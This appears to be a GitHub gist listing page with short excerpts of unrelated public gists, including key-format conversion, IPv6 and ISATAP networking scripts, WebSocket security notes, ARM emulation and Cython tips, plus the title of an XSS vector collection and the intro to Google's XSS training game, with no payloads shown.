@thwarted
thwarted / sshpub-to-rsa
Created June 14, 2011 09:12
converts an openssh RSA public key into a format usable by openssl rsautl (if you don't have openssh 5.6 or later with ssh-keygen PEM export format)
#!/usr/bin/env python
# with help and inspiration from
# * ASN1_generate_nconf(3) (specifically the SubjectPublicKeyInfo structure)
# * http://www.sysmic.org/dotclear/index.php?post/2010/03/24/Convert-keys-betweens-GnuPG%2C-OpenSsh-and-OpenSSL
# * http://blog.oddbit.com/2011/05/converting-openssh-public-keys.html
import sys
import base64
import struct
@yosemitebandit
yosemitebandit / openpyxl-install-with-pip
Created June 4, 2012 17:42
reading xlsx files in python with openpyxl
$ pip install -E ~/conf/virtualenvs/xyuml https://bitbucket.org/ericgazoni/openpyxl/get/1.5.8.zip
@ibeex
ibeex / foo.log
Created August 4, 2012 13:46
Flask logging example
A warning occurred (42 apples)
An error occurred
@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
@blahgeek
blahgeek / isatap.fish
Created September 17, 2013 10:43
ISATAP config for Mac OS X. Works either with or without NAT. (fish script)
#!/usr/local/bin/fish
function isatap
    set REMOTE_IP 166.111.21.1
    set LINK_PREFIX "fe80::200:5efe"
    set GLOBAL_PREFIX "2402:f000:1:1501:200:5efe"
    if sudo ifconfig gif0 destroy
        echo "Previous gif0 destroyed"
    end
@akorobov
akorobov / ipv6-httpd.py
Created December 11, 2013 00:58
quick ipv6 http server using python's SimpleHttpServer
import socket
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class MyHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/ip':
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
@subudeepak
subudeepak / WebSockets.md
Last active May 31, 2024 09:36
The problems and some security implications of websockets - Cross-site WebSockets Scripting (XSWS)

WebSockets - An Introduction

WebSockets is a modern HTML5 standard which makes communication between client and server a lot simpler than ever. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time, but communication over the browser has usually been restricted. The general restrictions:

  • The server used to have a permanent listener while the client (aka browser) was not designated any fixed listener for a more long term connection. Hence, every communication was restricted to the client demanding and the server responding.
  • This meant that unless the client requested for a particular resource, the server was unable to push such a resource to the client.
  • This was detrimental since the client is then forced to check with the server at regular intervals. This meant a lot of libraries focused on optimizing asynchronous calls and identifying the response of asynchronous calls. Notably t
@Liryna
Liryna / ARMDebianUbuntu.md
Last active October 13, 2024 16:16
Emulating ARM on Debian/Ubuntu

You might want to read this to get an introduction to armel vs armhf.

If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.

Running ARM programs under linux (without starting QEMU VM!)

First, cross-compile user programs with the GCC-ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on Linux.

@adriaandens
adriaandens / xss-game.md
Created May 31, 2014 18:59
xss-game by Google

XSS-game by Google

Welcome, recruit! Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch them, pronto!

At Google, we know very well how important these bugs are. In fact, Google is so serious about finding and fixing XSS issues that we are paying mercenaries up to $7,500 for dangerous XSS bugs discovered in our most sensitive products.

In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.

There will be cake at the end of the test.

@ctokheim
ctokheim / cython_tricks.md
Last active March 4, 2024 23:27
cython tricks

Cython

Cython has two major benefits:

  1. Making python code faster, particularly things that can't be done in scipy/numpy
  2. Wrapping/interfacing with C/C++ code

Cython gains most of its benefit from statically typing arguments. However, static typing is not required; in fact, regular Python code is valid Cython (but don't expect much of a speedup). By incrementally adding more type information, the code can speed up by several factors. This gist just provides a very basic usage of Cython.